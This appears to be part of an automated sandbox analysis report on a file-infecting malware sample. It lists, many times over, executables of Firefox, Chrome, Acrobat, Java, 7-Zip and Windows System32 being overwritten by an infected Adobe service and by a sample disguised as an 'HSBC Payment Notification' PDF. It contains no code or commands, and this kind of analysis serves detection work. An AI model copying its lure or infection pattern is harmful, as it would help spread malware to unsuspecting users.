                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
